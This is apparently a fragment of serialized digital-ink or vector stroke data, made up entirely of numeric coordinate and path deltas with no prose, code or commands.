1,1-1-1,0 1 0,0-1 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,1-1 1,-1 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0-1 0,0 1 1,2-1-1,35-6 888,-18 0-412,24-10-122,82-20-1,-122 36-364,0 1-1,0-1 1,1 1-1,-1 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0-1,0 1 1,0-1 0,0 1-1,-1-1 1,5 4-1,20 9-3,2 2-321,-29-5-1027,-18 3-1381,-7-3-2591,5-10 2247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85 420,'2'-36'5704,"-1"34"-5592,0 1-1,0-1 1,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,-1-1-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,-1-2-1,1 3 26,6-8 357,-5 7-360,-6 1 27,3 1 257,3 0-403,-1 1 1,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,0 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,1-1-1,-1 0 1,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1-1,-1 1 1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 2 0,0 6 253,0 1 1,0-1 0,-1 1 0,0-1-1,0 0 1,-5 14 0,4-10-102,0-1 0,0 1 1,2 0-1,-1-1 0,2 1 0,1 16 1,0 13 64,9 2-103,11 4-2339,-3-53-4901,-17 0 4110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1976,'-9'6'14376,"12"-6"-14475,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 1 0,1-1 0,-1 0-1,4 3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3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19 420,'0'-1'15653,"0"2"-15615,11 30 250,-11 163-292,-7-185 44,12-19-1,10-26-19,28-56 8,0 20-36,-41 69 10,0 0 0,1 1-1,-1-1 1,1 0-1,0 1 1,-1-1 0,1 1-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 1 0,5-3-1,6-3-56,-15 7 47,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,0-1 1,1 1-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,0 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1 0,1 0-1,-1 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1-1,-1-1 1,0 0 0,1 1-1,-1 0 1,9 18-307,-8-18-45,-1 0-1,0 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,1 0 1,7-1-2652,2 0-141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33 146 856,'52'-6'4105,"-39"6"-3839,0-2 0,0 0 0,25-7 0,-27 5-32,-1 0 1,-1-1-1,1 0 0,-1 0 0,12-9 0,5-3 705,-26 16-886,1 0 0,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,1 0 1,-1 0-1,0 0 1,1 0-1,-1 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1 0,-1-3-1,-12-23 1651,11 24-1604,-1 0 0,1 1-1,-1-1 1,1 0 0,-1 1 0,1 0 0,-1-1 0,0 1-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0 0 0,0 0 0,-5 1-1,-3 1 95,-1 0-1,1 1 0,-21 7 1,21-4-87,0 0 0,0 1 0,1 0 1,0 0-1,-10 10 0,16-13-17,0-1-36,0 1 1,0 0-1,0 0 1,1 0 0,0 1-1,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 1,1 0 0,1 0-1,-3 9 1,4-11-49,1-1 0,-1 1 1,1-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 0,4 0 1,67 17-24,-63-16 6,21 4-1366,46 1 0,-74-7 775,0 0 1,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,-1-1 0,1 1 0,-1 0 0,5-4 0,2 0-1860,2-1-460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31 1104,'-2'-23'6919,"-1"21"-6638,0 1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,0 0 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0 0 0,0 1 0,0-1 1,-5 4-1,3-3-148,0 1 1,1 1 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 2-1,1-1 1,-1 0-1,1 1 1,-4 8-1,3-5 43,-1 2-72,0 1 0,0 1 1,2-1-1,-1 1 0,1-1 1,-2 23-1,-6 33 94,5-40-45,5-25-131,0 0 0,0 0 0,0 1-1,1-1 1,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1-1,0-1 1,0 1 0,1-1 0,-1 1 0,2 4 0,16 83 298,-8-42-270,-8-40-57,0 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-2 0-1,-1 14 1,0 7 14,-8 15-49,-1-14-289,11 14 619,0-28-3474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64 904,'0'0'1370,"31"-18"4045,-28 14-5240,1-1 0,1 1 0,-1 1-1,1-1 1,-1 1 0,1 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,0 2-1,1-1 1,-1 0 0,1 1 0,0 0-1,6 0 1,1 0-469,0 2 0,0-1 0,0 2 0,0 0 0,-1 0 0,15 5 0,-16-6-3372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 1028,'0'0'4721,"-35"18"-820,14 0-2818,18-15-920,0-1-1,0 0 1,0 1-1,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-3 6 0,-22 32 1317,22-36-1297,1 0 0,-1 1 0,2 0 0,-1 0-1,1 0 1,-1 0 0,-3 11 0,-46 182 1234,51-190-1407,1-1 1,0 1 0,1-1 0,1 16 0,0-4-8,-1-18-3,0-1 1,1 1-1,-1 0 1,1-1 0,0 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1-1 1,-1 1 0,1 0-1,-1-1 1,1 1-1,0-1 1,-1 0-1,4 1 1,55 3-631,-21-9-3281,-14-8-2857,-14 7 3346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0 114 280,'35'-11'4766,"-11"5"-3860,-21 6-852,0 0 0,0-1 1,0 1-1,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,0 0 1,-1-1-1,5-2 0,36-25 839,-42 29-855,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,-1 1 1,1-1-1,-1 0 1,1 0-1,0 1 0,-1-1 1,0 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 0-1,-1 0 0,1 1 1,-1-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,1 1 0,-1-1 1,-1 0-1,0 0 43,0-1-1,0 0 0,0 1 0,0 0 0,0-1 1,-1 1-1,1 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 1 0,1-1 1,-1 1-1,1 0 0,-4 0 0,1 2 23,1-1-1,-1 1 1,0-1-1,0 2 0,1-1 1,0 0-1,-1 1 1,1 0-1,0 0 0,0 0 1,0 0-1,1 1 1,-1 0-1,1-1 0,0 1 1,0 0-1,0 1 1,0-1-1,-3 8 0,3-1 2,-1 0 0,1 1-1,1-1 1,0 1-1,1 0 1,0 0 0,1 13-1,1-24-102,-1 1 0,0-1-1,0 0 1,1 0 0,-1 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,2 1 1,44 6-397,-21-4-1867,9-3-5049,-16-5 4368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19 360,'-23'-11'5987,"-3"4"-3565,24 7-2371,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,0 1 0,1-1 1,-1 0-1,1 1 0,0-1 0,0 1 1,-1-1-1,1 1 0,-1 1 1,0 0 10,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,-6 3 0,7-5-34,0 0 0,1 0-1,-1 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1 0 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0-1,1 1 1,-1-1 0,1 4 0,-1-5 20,1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1-1 1,0 1-1,1-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,2 2 0,1 2 110,-1-1-147,0 0 1,0 0-1,0 0 1,1 0 0,0-1-1,0 0 1,0 0-1,0 0 1,0 0 0,0 0-1,1-1 1,-1 0 0,1 0-1,0 0 1,9 2-1,17-2-282,6-2-1503,-33 0 1306,-1-1 1,1 0 0,-1-1 0,0 1-1,0 0 1,1-1 0,-1 0 0,0 0 0,0 0-1,4-3 1,5-4-2095,8-2-41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 1624,'0'0'1558,"-7"-1"4030,3 1-4632,-7 57 490,1 10-808,6-54-444,2 1-1,0 0 1,-1 15-1,-8 69 202,11 71-1337,0-169 875,0 0-1,-1 0 0,1 1 1,0-1-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0-1-1,-1 1 1,1 0-1,0 0 0,0 0 1,-1 0-1,1-1 1,0 1-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0-1 0,0 1 1,0-1-1,-12-11-2933,-6-6-344,16 5 1424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63 192,'2'-24'8177,"1"20"-7700,1 0 0,0 1 0,0-1 0,0 1 0,0 0 1,0 0-1,1 0 0,6-3 0,-7 5-451,0 0 0,0-1 0,0 2 0,0-1 0,0 0 0,1 1 0,-1 0-1,0 0 1,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 1 0,7 4 0,-2-2-65,33 18-2289,7-6-5061,-28-11 4431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6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40 708,'0'7'12882,"0"-8"-12566,-5 1 262,4-1-558,1 1 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 1,0-1-1,0 1 1,-1-1-1,1 0 1,0 1 0,0-1-1,0 1 1,-1 0-1,-3 4 62,4-4-71,-1-1 1,1 0-1,0 0 0,-1 0 1,1 1-1,-1-1 0,1 0 0,0 0 1,-1 1-1,1-1 0,0 0 0,-1 1 1,1-1-1,0 1 0,0-1 1,-1 0-1,1 1 0,0-1 0,0 1 1,0-1-1,-1 1 0,1-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 1 1,0-1-1,0 1 0,1 0 0,-12 34 579,0 20-401,0 10-139,0-9-43,1 40 18,-1-23-17,11-56-74,3-22-58,3-13 236,5-55 40,21-97-124,-30 162-27,0 0 0,0 1 1,0 0 0,0 0 0,1-1 0,0 2-1,0-1 1,0 0 0,1 1 0,0-1 0,1 1-1,-1 0 1,1 0 0,0 1 0,11-9 0,16-16-13,-26 24 9,0 0-1,1 0 0,-1 1 0,14-9 0,-12 8 8,-7 5-5,0-1-1,0 1 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0 0,0 0-1,0 0 1,1 1-1,-1-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,1 1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,0 0 0,0 0-1,0-1 1,1 1-1,-1 0 1,0 0 0,0 0-1,0 0 1,1 2 0,-1-1-5,0-1 1,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-3 3 0,-1 3-23,-1-1 1,0 0-1,0 0 1,-10 10-1,9-10-33,-1-1-269,1 0 0,0-1 0,-1 0 0,0 0 0,0-1 0,-1 0-1,1 0 1,-1-1 0,-12 4 0,13-4-621,-1-1 0,1 0 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1-1 0,-1 0 0,0-1 0,-13-2 0,10 2-1168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7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1092,'-9'36'4717,"21"-9"-3933,-12-25-721,1 1 1,0 0 0,0 0 0,0 0 0,0-1-1,1 1 1,-1-1 0,1 1 0,-1-1-1,1 1 1,3 3 0,49 36 499,-51-40-542,0 0 1,0 0 0,0-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,0-1 0,1 1-1,-1 0 1,0-1 0,1 0-1,-1 0 1,0 0 0,1 0-1,-1 0 1,0-1 0,1 1-1,-1-1 1,0 0 0,0 0-1,1 0 1,-1-1 0,0 1 0,0-1-1,0 1 1,-1-1 0,6-4-1,1-1 50,0 0 0,-1-1 0,1 0 0,-2 0 0,1-1-1,-1 0 1,8-13 0,-14 20-19,-1 0 1,1 0-1,0 0 0,-1 1 1,1-1-1,-1 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 1,0 0-1,-1-2 0,-4-16 357,5 19-360,1 0-1,-1-1 1,1 1 0,-1 0-1,0-1 1,0 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,0 1-1,-1-1 1,1 0 0,0 1-1,-1-1 1,1 1 0,-3-1-1,-34-7 910,29 8-885,1 0-1,-1 1 1,0 0 0,0 0-1,1 1 1,-1 0 0,1 1-1,0 0 1,-1 0 0,1 0-1,0 1 1,1 1 0,-1-1-1,1 1 1,-9 8 0,14-12-75,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 1,1 1-1,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 0,-1 0 1,3 4-1,-2-3 0,1-1 1,-1 0 0,1 0-1,0 1 1,0-1 0,0 0-1,0 0 1,1-1 0,-1 1-1,0 0 1,1-1 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1-1 1,0 0 0,4 1-1,157-1-57,-160 0 59,1 1 0,-1-1 0,0 1 0,0 0 0,1 1 1,-1-1-1,7 4 0,-10-4 1,1-1 1,-1 1 0,0 0-1,1-1 1,-1 1-1,1 0 1,-1 0 0,0 0-1,0 0 1,0 0-1,1 1 1,-1-1 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 1 1,0-1-1,-1 1 1,2 1 0,3 5-196,-3-6-190,-8 6-124,2 4-2574,-2-1-2609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8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2 360,'0'-1'5323,"0"2"-4789,9 17 2134,7 2-1231,-13-15-1217,1 0-1,0 0 1,0 0 0,0-1 0,1 0-1,-1 0 1,7 4 0,0 3-70,0-2-62,2-4-48,-12-4-39,1 0 0,-1-1-1,1 1 1,-1 0 0,1-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,-1 0-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,-1-1 0,1 0-1,-1 1 1,1-1 0,1-1-1,61-34-78,-21 0 98,-27 23 18,-6 5 9,-10 8-45,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,-1 1 1,1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0 0 1,0 1-1,0-1 0,-2 0 50,-21 19 339,17-12-272,1 0 0,-1 0 0,0-1 0,-1 0 0,-10 9 0,-19 17 519,-115 141 1181,138-158-1819,1 1-1,0 0 1,-15 28 0,16-13-25,10-31-2,1 1-1,-1 0 1,1-1-1,0 1 1,-1 0 0,1-1-1,0 1 1,-1 0-1,1 0 1,0-1-1,0 1 1,0 0-1,0 0 1,-1 0-1,1-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,0 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1-1 1,0 2-1,0-2-118,-1 1 1,1-1-1,-1 1 0,1-1 1,0 0-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 0,1 0 0,0-1 1,0 1-1,-1 0 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 0,1 1 1,-1-1-1,2 0 0,10-17-5720,-1 6 2862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1 420,'0'0'2994,"-1"13"894,-25 14-890,10-7-1682,2-5-660,11-11-435,-1-1-1,1 1 0,0 0 1,-1 0-1,2 0 0,-1 0 1,0 1-1,-3 8 0,-26 49 1540,0 34-869,25-71-767,4-16-94,0 1 0,1 0 1,0 0-1,-1 17 1,3-24-35,1 1 1,0 0 0,0 0 0,0-1-1,0 1 1,0-1 0,1 1 0,-1-1-1,1 1 1,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,4 3-1,14 0-574,0 1 1,32 17-1,-52-24 293,0 0-1,0 0 1,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,-1-1 0,1 1 0,0 0-1,0 0 1,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0-1,0-1 1,-1 1 0,1-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1-1,1 1 1,-1-2 0,1 1 141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43 308,'0'7'3592,"0"24"-2025,0-27-1525,0 0 0,1 0 1,0 0-1,-1-1 1,2 1-1,-1 0 0,0 0 1,1-1-1,-1 1 1,1 0-1,0-1 1,0 0-1,1 1 0,-1-1 1,1 0-1,-1 0 1,1 0-1,0-1 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,1-1-1,-1 1 0,1 0 1,0-1-1,0 0 1,-1 0-1,1 0 0,0 0 1,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,0-1 0,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0-1-1,-1 0 1,1 0-1,-1 0 1,1 0-1,5-5 0,22-12 89,-28 17-105,1 1 0,-1-1-1,1 0 1,-1 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,-1 0 0,0 0 0,3-5-1,-3 4 3,-2 3 5,1 0 0,0 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 1 0,-1-3 0,-6-9 712,7 10-683,1 1-1,-1 0 1,0-1 0,0 1 0,1 0-1,-1 0 1,0-1 0,0 1 0,-1 0-1,1 0 1,0 0 0,0 0 0,-2-1-1,-3-1 55,-1 0-1,1 1 1,0-1-1,-1 2 1,1-1-1,-1 0 1,0 1-1,1 0 1,-1 1-1,-13 0 0,17 0-112,0 0 0,-1 1-1,1-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 1 0,0 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-2 3 1,-5 7-164,8-12 92,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,1 0 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,1 1 0,0-1 1,-1 1-1,1 1 0,-11 20-5391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33 119 280,'-1'0'211,"0"0"-1,-1 0 1,1 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 1 0,1-1-1,0 1 1,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 1 0,-1 1-1,1-2-164,0 1 0,0-1-1,1 0 1,-1 1 0,0 0 0,1-1-1,-1 1 1,1-1 0,0 1-1,0 0 1,-1-1 0,1 1-1,0-1 1,0 1 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1-1,-1 1 1,1-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,0 0 1,0 1 0,1 1 0,6 12 142,-8-13-182,1-1 0,-1 0 0,1 1 0,-1-1-1,1 0 1,-1 0 0,1 0 0,0 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0-1-1,2 2 1,0 0 1,1-1 0,-1 0-1,0 0 1,1 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0-1-1,-1 1 1,0-1 0,1 0-1,-1 0 1,1 0 0,-1-1 0,0 1-1,0-1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,-1-1-1,3-2 1,35-31 541,-38 31-343,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 1,0 0-1,0 0 0,0-1 1,-1 1-1,0 0 0,0 0 0,0-1 1,-1 1-1,1 0 0,-1 0 1,-1 0-1,1 0 0,-1 0 0,-2-5 1,-28-34 1714,31 43-1893,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-1,0-1 1,0 1 0,0 0-1,0-1 1,-1 1 0,1 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,0 0 1,0 1 0,0-1-1,-1 1 1,1 0 0,0-1-1,-1 2 1,-35 32-79,25-21 113,9-11-61,0 2 0,0-1 0,0 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,1 0 0,-3 5 0,4-7-3,-1 0 0,0 0-1,1 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1-1 0,0 1 0,0 0 0,2 3-1,3 5-25,-6-9 25,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,-1 0 0,1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 1 1,-1-1-1,1 1 0,0-1 0,2 1 0,4 1-126,28 11-2095,-34-12 2055,-1-1-1,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 1,1-1-1,0 1 0,-1 0 1,1-1-1,-1 1 0,1-1 1,-1 1-1,0 0 0,1-1 1,-1 1-1,1-1 0,-1 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1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68 1316,'-5'22'4056,"5"-21"-4013,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 1-1,0-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 1,-1-1-1,2 2 0,9 33 190,-10-34-231,0 1 0,1-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1-1 0,0 1-1,1-1 1,-1 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,4 1 0,-2-2-2,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,0-1 0,1-1-1,-1 1 1,0 0 0,0-1 0,0 0-1,6-4 1,0 1 2,0-1-1,0 0 1,0-1-1,-1 0 1,11-12-1,-17 16 114,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1-1 1,-2 1-1,1-1 1,0 1-1,-1-1 1,0 0-1,0 1 1,0-1-1,-1 0 1,0-7-1,0 10-38,-1-1 1,1 1-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,0-1 1,1 1-1,-1-1 0,0 1 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 1 1,-4-2-1,3 1-39,-1 0-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 1-1,0 0 1,1 0-1,-1 0 1,0 0-1,0 1 1,0-1-1,1 1 1,-1 0-1,-5 2 1,5-1-32,-12 7 17,1 0 1,-26 21-1,37-27-29,1 0-1,-1 0 1,1 0-1,0 0 0,0 1 1,0 0-1,0 0 0,1-1 1,-1 1-1,1 1 1,0-1-1,0 0 0,1 0 1,-1 1-1,1-1 1,-1 8-1,-2 8-154,3-19 128,1 0 1,0 0-1,-1 0 1,1 0 0,0 1-1,-1-1 1,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,0 0 1,1 0 0,-1 1-1,0-1 1,0 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,0 1 1,4 7-1188,-5-8 1076,0-1 1,0 1 0,1 0 0,-1-1-1,0 1 1,1 0 0,-1-1-1,1 1 1,-1-1 0,0 1 0,1-1-1,-1 1 1,1-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 1-1,-1-1 1,1 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,-1 0 0,2-1 0,7 1-2052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49 464,'0'-48'7999,"-20"67"-6676,17-11-1161,1-1 1,0 1 0,0 0-1,1 0 1,0 0 0,0 17-1,0 4-5,0-12-159,1 0 0,1 0 0,0 0-1,8 31 1,16 37 50,-24-82-63,1 2-346,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 0 1,0 0 0,5 5-1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1476,'-1'19'6580,"-7"17"-5663,6-28-852,0 1-1,1 0 1,0 0-1,0 0 1,1 0-1,1 1 0,1 11 1,0 10-81,-2-29 19,0 3-105,0 0 0,0 0 0,0 0 0,0 0-1,-1 0 1,0 0 0,0 0 0,-1 0-1,-2 7 1,4-11 84,0-1 0,-1 0 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,1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6 280,'0'0'1692,"0"-6"2889,0 12-4545,0 0-36,0 6-72,0-6-164,0 6-252,0-5-421,-10-1-667,10 6-392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2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1 644,'11'18'5420,"-11"-10"-4845,1-3-364,-1 0 1,0-1 0,0 1-1,-1 0 1,1 0-1,-1 0 1,0-1-1,0 1 1,-1 0 0,-2 4-1,2-4-81,0-1 0,0 1 1,1 0-1,-1-1 0,1 1 0,0 0 0,1 0 0,-1 7 1,-7 2 351,4-7 888,14-11-391,2-20-143,53-53-496,-54 66-238,17-13 500,-27 23-583,1 0 1,-1 1-1,0-1 1,1 1-1,-1-1 1,0 1-1,1-1 1,-1 1-1,1 0 1,-1 